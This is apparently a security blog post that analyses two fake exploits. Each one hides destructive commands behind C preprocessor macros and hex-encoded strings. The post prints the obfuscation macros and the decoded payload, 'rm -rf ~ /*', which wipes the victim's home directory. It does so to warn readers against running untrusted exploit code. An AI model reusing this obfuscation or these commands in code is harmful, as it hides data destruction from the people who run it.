This code is pretty long and look just like another exploit, with true pieces of shellcode and calls to sockets' functions. But, look more closely... At the line 245, a call to
fremote("PS1='sh-3.2#' /bin/sh") is done and when we look at the definition of fremote, we can see:
#define fremote build_frem(t,e,s,m,y)
build_frem is defined as:
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
Which means that
fremote will be replaced by system once the preprocessor processed the file. So if we search all the references to fremote we will end up with:
174: system(jmpcode);
245: system("PS1='sh-3.2#' /bin/sh");
But
jmpcode is a shellcode right? Uh no... in fact is just a normal string, except that it is written with the ascii code of the characters.
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"
==
rm -rf ~ /* 2> /dev/null &
If you try to launch this exploit on your unix box: pwn! If you want to get the preprocessed version automagicaly, use
gcc -E.Another example that I have in mind is a fake exploit for wuftp that was released in 2001 on vuln-dev. This one was also obfuscated using preprocessor's directives.
At the top of the code we can see:
#define DEF_ALGN 1 * target system
...
#define target (unsigned long)
...
#define ADDR 0x08049588
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,
After preprocessing, this looks like:
unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;
Later on, the address of puts is overwriten with the address of system:
for(i = 0; i < 4; i++)
sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);
...
pots = *(unsigned long *)(attack[1] + 2);
...
*(unsigned long *)pots = align;
And finally, puts is called resulting in the destruction of the user's home directory:
puts("echo ~ ok, it seems to have worked... remember: \");
puts("rm -rf is not elite ~");
I hope that this post will makes you think twice before executing an exploit :)
No comments:
Post a Comment